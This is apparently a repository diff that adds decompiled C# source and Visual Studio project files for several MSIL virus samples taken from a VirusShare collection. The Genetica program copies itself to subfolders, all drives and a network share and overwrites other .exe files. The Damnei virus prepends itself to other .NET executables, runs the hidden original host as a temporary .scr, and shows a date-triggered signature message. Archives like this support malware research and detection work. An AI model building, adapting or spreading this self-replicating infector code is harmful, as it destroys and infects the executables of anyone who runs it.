<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{E87DC481-08E4-47A6-967A-BBE3F1775FEB}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>A1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>A1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002/Virus.MSIL.Small.d.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "A1", "Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002.csproj", "{E87DC481-08E4-47A6-967A-BBE3F1775FEB}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E87DC481-08E4-47A6-967A-BBE3F1775FEB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{E87DC481-08E4-47A6-967A-BBE3F1775FEB}.Debug|Any CPU.Build.0 = Debug|Any CPU
{E87DC481-08E4-47A6-967A-BBE3F1775FEB}.Release|Any CPU.ActiveCfg = Release|Any CPU
{E87DC481-08E4-47A6-967A-BBE3F1775FEB}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("54fe8a70-2a61-4cab-a28c-3255bccb2dd4")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © Trojan 2006")]
[assembly: AssemblyProduct("ConsoleApplication1")]
[assembly: AssemblyCompany("Trojan")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("ConsoleApplication1")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f/Program.cs
+101
View File
@@ -0,0 +1,101 @@
// Decompiled with JetBrains decompiler
// Type: Genetica.Program
// Assembly: Genetica, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 38269FF5-76F0-4DD3-B590-2FD089D27FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
namespace Genetica
{
internal class Program
{
private static void Main(string[] args)
{
int num = 5;
string str1 = (string) null;
object obj = Registry.LocalMachine.OpenSubKey("System\\CurrentControlSet\\Services\\lanmanserver\\Shares", false).GetValue("shared");
string str2 = obj as string;
char[] charArray = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".ToCharArray();
string[] logicalDrives = Directory.GetLogicalDrives();
Random random = new Random();
string location = Assembly.GetExecutingAssembly().Location;
string currentDirectory = Environment.CurrentDirectory;
if (currentDirectory.Substring(currentDirectory.Length - 1) != "\\")
currentDirectory += "\\";
string[] files = Directory.GetFiles(currentDirectory);
string[] directories = Directory.GetDirectories(currentDirectory, "*");
for (int index1 = 0; index1 < num; ++index1)
{
int index2 = random.Next(charArray.Length);
str1 += charArray[index2].ToString();
}
int index3 = 0;
for (int length = directories.Length; index3 < length; ++index3)
{
if (directories[index3].Substring(directories[index3].Length - 1) != "\\")
{
string[] strArray;
IntPtr index4;
(strArray = directories)[(int) (index4 = (IntPtr) index3)] = strArray[index4] + "\\";
File.Copy(location, directories[index3] + str1 + ".exe");
}
}
for (int index5 = 0; index5 <= logicalDrives.GetUpperBound(0); ++index5)
{
try
{
File.Copy(location, logicalDrives[index5] + str1 + ".exe");
}
catch
{
}
}
string[] strArray1 = obj as string[];
string str3 = strArray1[2];
if (strArray1 != null)
{
try
{
strArray1.GetEnumerator();
string str4 = str3.Substring(str3.Length - (str3.Length - 5)) + "\\";
File.Copy(location, str4 + str1 + ".exe");
}
catch
{
}
}
for (short index6 = 0; (int) index6 < files.GetUpperBound(0); ++index6)
{
if (files[(int) index6].Substring(files[(int) index6].Length - (files[(int) index6].Length - files[(int) index6].Length + 4)) == ".exe")
{
if ("\r\n" + files[(int) index6] != location)
{
try
{
string path1 = location;
string path2 = files[(int) index6];
FileStream fileStream1 = new FileStream(path1, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream(path2, FileMode.Create, FileAccess.Write);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, Convert.ToInt32(fileStream1.Length));
fileStream2.Write(buffer, 0, Convert.ToInt32(fileStream1.Length));
fileStream1.Close();
fileStream2.Close();
fileStream1.Dispose();
fileStream2.Dispose();
}
catch
{
}
}
}
}
Console.Write("Retro is Evil!!");
Console.Read();
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f/Virus.MSIL.Small.e.csproj
+37
View File
@@ -0,0 +1,37 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EDF8135E-900A-4762-8C84-977F6FBD7B71}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>Genetica</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Genetica</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f/Virus.MSIL.Small.e.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Genetica", "Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f.csproj", "{EDF8135E-900A-4762-8C84-977F6FBD7B71}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EDF8135E-900A-4762-8C84-977F6FBD7B71}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EDF8135E-900A-4762-8C84-977F6FBD7B71}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EDF8135E-900A-4762-8C84-977F6FBD7B71}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EDF8135E-900A-4762-8C84-977F6FBD7B71}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.2213.28388")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a/Damnei.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: FirstPrep.Damnei
// Assembly: FirstPrep, Version=1.0.2213.28388, Culture=neutral, PublicKeyToken=null
// MVID: 46B1E01E-D7F8-4B55-B7B0-B711CAFCABC5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a.exe
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;
namespace FirstPrep
{
public class Damnei : Form
{
private Container components = (Container) null;
public Damnei() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.AutoScaleBaseSize = new Size(5, 13);
this.ClientSize = new Size(90, 2);
this.FormBorderStyle = FormBorderStyle.FixedToolWindow;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Damnei);
this.ShowInTaskbar = false;
this.Text = "MSIL.Damnei";
this.WindowState = FormWindowState.Minimized;
this.Load += new EventHandler(this.Damnei_Load);
}
[STAThread]
private static void Main() => Application.Run((Form) new Damnei());
private void Damnei_Load(object sender, EventArgs e)
{
new DamneiVirus().Start();
Application.Exit();
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a/Damnei.resx
+150
View File
@@ -0,0 +1,150 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.SnapToGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAQs=</value>
</data>
<data name="$this.TrayLargeIcon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>BkRhbW5laQ==</value>
</data>
<data name="$this.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAExTeXN0ZW0sIFZlcnNpb249MS4wLjUwMDAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="$this.Locked" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.DrawGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAQs=</value>
</data>
<data name="$this.Localizable" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Language" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAACBTeXN0ZW0uR2xvYmFsaXphdGlvbi5DdWx0dXJlSW5mbwoAAAAGbV9uYW1lCm1fZGF0YUl0ZW0RbV91c2VVc2VyT3ZlcnJpZGUJY3VsdHVyZUlEDG1faXNSZWFkT25seQtjb21wYXJlSW5mbwh0ZXh0SW5mbwdudW1JbmZvDGRhdGVUaW1lSW5mbwhjYWxlbmRhcgEAAAAAAwMDAwMIAQgBIFN5c3RlbS5HbG9iYWxpemF0aW9uLkNvbXBhcmVJbmZvHVN5c3RlbS5HbG9iYWxpemF0aW9uLlRleHRJbmZvJVN5c3RlbS5HbG9iYWxpemF0aW9uLk51bWJlckZvcm1hdEluZm8nU3lzdGVtLkdsb2JhbGl6YXRpb24uRGF0ZVRpbWVGb3JtYXRJbmZvHVN5c3RlbS5HbG9iYWxpemF0aW9uLkNhbGVuZGFyBgIAAAAAygAAAAB/AAAAAQkDAAAACQQAAAAJBQAAAAoKBAMAAAAgU3lzdGVtLkdsb2JhbGl6YXRpb24uQ29tcGFyZUluZm8CAAAACXdpbjMyTENJRAdjdWx0dXJlAAAICH8AAAB/AAAABAQAAAAdU3lzdGVtLkdsb2JhbGl6YXRpb24uVGV4dEluZm8DAAAAC21fbkRhdGFJdGVtEW1fdXNlVXNlck92ZXJyaWRlDW1fd2luMzJMYW5nSUQAAAAIAQjKAAAAAH8AAAAEBQAAACVTeXN0ZW0uR2xvYmFsaXphdGlvbi5OdW1iZXJGb3JtYXRJbmZvHwAAABBudW1iZXJHcm91cFNpemVzEmN1cnJlbmN5R3JvdXBTaXplcxFwZXJjZW50R3JvdXBTaXplcwxwb3NpdGl2ZVNpZ24MbmVnYXRpdmVTaWduFm51bWJlckRlY2ltYWxTZXBhcmF0b3IUbnVtYmVyR3JvdXBTZXBhcmF0b3IWY3VycmVuY3lHcm91cFNlcGFyYXRvchhjdXJyZW5jeURlY2ltYWxTZXBhcmF0b3IOY3VycmVuY3lTeW1ib2wSYW5zaUN1cnJlbmN5U3ltYm9sCW5hblN5bWJvbBZwb3NpdGl2ZUluZmluaXR5U3ltYm9sFm5lZ2F0aXZlSW5maW5pdHlTeW1ib2wXcGVyY2VudERlY2ltYWxTZXBhcmF0b3IVcGVyY2VudEdyb3VwU2VwYXJhdG9yDXBlcmNlbnRTeW1ib2wOcGVyTWlsbGVTeW1ib2wKbV9kYXRhSXRlbRNudW1iZXJEZWNpbWFsRGlnaXRzFWN1cnJlbmN5RGVjaW1hbERpZ2l0cxdjdXJyZW5jeVBvc2l0aXZlUGF0dGVybhdjdXJyZW5jeU5lZ2F0aXZlUGF0dGVybhVudW1iZXJOZWdhdGl2ZVBhdHRlcm4WcGVyY2VudFBvc2l0aXZlUGF0dGVybhZwZXJjZW50TmVnYXRpdmVQYXR0ZXJuFHBlcmNlbnREZWNpbWFsRGlnaXRzCmlzUmVhZE9ubHkRbV91c2VVc2VyT3ZlcnJpZGUVdmFsaWRGb3JQYXJzZUFzTnVtYmVyF3ZhbGlkRm9yUGFyc2VBc0N1cnJlbmN5BwcHAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAAAAAAgICAgICAgICAgICAEBAQEJBgAAAAkHAAAACQYAAAAGCQAAAAErBgoAAAABLQYLAAAAAS4GDAAAAAEsBg0AAAABLAYOAAAAAS4GDwAAAALCpAoGEAAAAANOYU4GEQAAAAhJbmZpbml0eQYSAAAACS1JbmZpbml0eQkLAAAACQwAAAAGFQAAAAElBhYAAAAD4oCwygAAAAIAAAACAAAAAAAAAAAAAAABAAAAAAAAAAAAAAACAAAAAQABAQ8GAAAAAQAAAAgDAAAADwcAAAABAAAACAMAAAAL</value>
</data>
<data name="$this.GridSize" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFRTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAV3aWR0aAZoZWlnaHQAAAgIAgAAAAgAAAAIAAAACw==</value>
</data>
<data name="$this.TrayHeight" mimetype="application/x-microsoft.net.object.binary.base64">
<value>UAAAAA==</value>
</data>
</root>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a/DamneiVirus.cs
+118
View File
@@ -0,0 +1,118 @@
// Decompiled with JetBrains decompiler
// Type: FirstPrep.DamneiVirus
// Assembly: FirstPrep, Version=1.0.2213.28388, Culture=neutral, PublicKeyToken=null
// MVID: 46B1E01E-D7F8-4B55-B7B0-B711CAFCABC5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Windows.Forms;
namespace FirstPrep
{
public class DamneiVirus
{
public void Start()
{
int length = 20480;
int index1 = 8422;
string fileName = Process.GetCurrentProcess().MainModule.FileName;
byte[] numArray1 = new byte[length];
FileStream input1 = new FileStream(fileName, FileMode.Open, FileAccess.Read);
BinaryReader binaryReader1 = new BinaryReader((Stream) input1);
for (int index2 = 0; index2 < length; ++index2)
numArray1[index2] = binaryReader1.ReadByte();
byte[] numArray2 = new byte[input1.Length - (long) length];
int index3 = 0;
try
{
while (true)
{
numArray2[index3] = binaryReader1.ReadByte();
++index3;
}
}
catch (EndOfStreamException ex)
{
}
binaryReader1.Close();
input1.Close();
foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
{
try
{
AssemblyName.GetAssemblyName(file);
}
catch (BadImageFormatException ex)
{
continue;
}
try
{
FileStream input2 = new FileStream(file, FileMode.Open, FileAccess.Read);
BinaryReader binaryReader2 = new BinaryReader((Stream) input2);
byte[] numArray3 = new byte[input2.Length];
int index4 = 0;
try
{
while (true)
{
numArray3[index4] = binaryReader2.ReadByte();
++index4;
}
}
catch (EndOfStreamException ex)
{
}
if ((int) numArray1[index1] == (int) numArray3[index1])
{
binaryReader2.Close();
input2.Close();
}
else
{
binaryReader2.Close();
input2.Close();
FileStream output = new FileStream(file, FileMode.Open, FileAccess.Write);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
for (int index5 = 0; index5 < length; ++index5)
binaryWriter.BaseStream.WriteByte(numArray1[index5]);
for (int index6 = 0; index6 < numArray3.Length; ++index6)
binaryWriter.BaseStream.WriteByte(numArray3[index6]);
binaryWriter.Close();
output.Close();
}
}
catch (Exception ex)
{
}
}
string str = "temp" + new Random(DateTime.Now.Millisecond).Next(10000).ToString() + ".scr";
FileStream output1 = new FileStream(str, FileMode.Create, FileAccess.Write);
BinaryWriter binaryWriter1 = new BinaryWriter((Stream) output1);
for (int index7 = 0; index7 < numArray2.Length; ++index7)
binaryWriter1.BaseStream.WriteByte(numArray2[index7]);
binaryWriter1.Close();
output1.Close();
File.SetAttributes(str, FileAttributes.Hidden);
if (DateTime.Now.Month == 1)
{
if (DateTime.Now.Day == 21)
{
int num1 = (int) MessageBox.Show("http://www.vx-dia.de.vu/ - http://www.rrlf.de.vu/", "Infected with MSIL.Damnei by DiA/RRLF");
}
}
try
{
Process.Start(str).WaitForExit();
}
catch (Exception ex)
{
int num2 = (int) MessageBox.Show("Can not execute " + fileName, "Error");
}
File.Delete(str);
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a/Virus.MSIL.Small.f.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>FirstPrep</AssemblyName>
<ApplicationVersion>1.0.2213.28388</ApplicationVersion>
<RootNamespace>FirstPrep</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="DamneiVirus.cs" />
<Compile Include="Damnei.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Damnei.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a/Virus.MSIL.Small.f.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FirstPrep", "Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a.csproj", "{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}.Release|Any CPU.Build.0 = Release|Any CPU
